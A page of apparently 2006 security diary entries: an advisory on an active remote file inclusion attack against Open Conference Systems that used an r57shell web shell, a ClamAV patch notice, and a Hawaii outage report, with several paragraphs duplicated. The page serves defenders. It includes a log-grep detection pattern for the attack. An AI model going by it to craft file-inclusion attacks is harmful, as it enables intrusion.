Active exploit of Open Conference Systems web application
We're looking into a host compromise reported by Mike, a diary reader. Mike reported a PHP remote file inclusion attack against an Open Conference Systems web application used in his organization. A modified r57shell php script was used to compromise the system.
A vulnerability disclosure for the Open Conference System was posted to BugTraq on Friday October 13th which mentions that version <= 1.1.3 are vulnerable. Interestingly enough, the official software distribution site at http://pkp.sfu.ca/ocs_download/ states that all versions prior to version 1.1.6 are vulnerable. Take a look at your respective environments to determine if you are running OCS software, and if you find it... Do I have to say it? Patch.
The time between vulnerability disclosure and determined time of host compromise in this case was approximately 1.5 hours. I can only speculate as to how many hosts have already or are yet to become phishing sites, spammer nodes, iframe exploit hosts or fall prey to any other manner of abuse due to this vulnerability.
If you do have OCS installed, a quick check for abuse could be indicated by the following command line statement.
grep "fullpath=http:" YourWebServerLogLocation.log
Handler on Duty
William Salusky
A vulnerability disclosure for the Open Conference System was posted to BugTraq on Friday October 13th which mentions that version <= 1.1.3 are vulnerable. Interestingly enough, the official software distribution site at http://pkp.sfu.ca/ocs_download/ states that all versions prior to version 1.1.6 are vulnerable. Take a look at your respective environments to determine if you are running OCS software, and if you find it... Do I have to say it? Patch.
The time between vulnerability disclosure and determined time of host compromise in this case was approximately 1.5 hours. I can only speculate as to how many hosts have already or are yet to become phishing sites, spammer nodes, iframe exploit hosts or fall prey to any other manner of abuse due to this vulnerability.
If you do have OCS installed, a quick check for abuse could be indicated by the following command line statement.
grep "fullpath=http:" YourWebServerLogLocation.log
Handler on Duty
William Salusky
Keywords:
0 comment(s)
ClamAV fixes multiple vulnerabilities
Multiple vulnerabilities have been fixed with the release of version 0.88.5 of the free and open-source ClamAV AntiVirus product related to the handling of PE files and the unpacking of CHM help files. The PE handling issue poses a significant risk and users of versions prior to ClamAV 0.88.5 are urged to upgrade ASAP.
Optionally, and also of noteworthiness on the ClamAV site, is the availability of release candidate v0.90RC1. You may want to consider testing out this new release of ClamAV software in addition to your security conscious software upgrade.
Handler on Duty
William Salusky
Optionally, and also of noteworthiness on the ClamAV site, is the availability of release candidate v0.90RC1. You may want to consider testing out this new release of ClamAV software in addition to your security conscious software upgrade.
Handler on Duty
William Salusky
Keywords:
0 comment(s)
Hawaii connectivity
After this morning's earthquake, we have reports of networks to or in Hawaii that are down, including www.hawaii.gov. News about the incident can be found at:
http://www.thehawaiichannel.com/video/4324656/index.html ,
http://www.thehawaiichannel.com/news/index.html ,
http://www.cnn.com , and
http://the.honoluluadvertiser.com/article/2006/Oct/15/br/br9634517802.html . We send our best wishes to the residents of Hawaii. (Thanks to two readers for their help.)
http://www.thehawaiichannel.com/video/4324656/index.html ,
http://www.thehawaiichannel.com/news/index.html ,
http://www.cnn.com , and
http://the.honoluluadvertiser.com/article/2006/Oct/15/br/br9634517802.html . We send our best wishes to the residents of Hawaii. (Thanks to two readers for their help.)
Keywords:
0 comment(s)
×
Diary Archives
Comments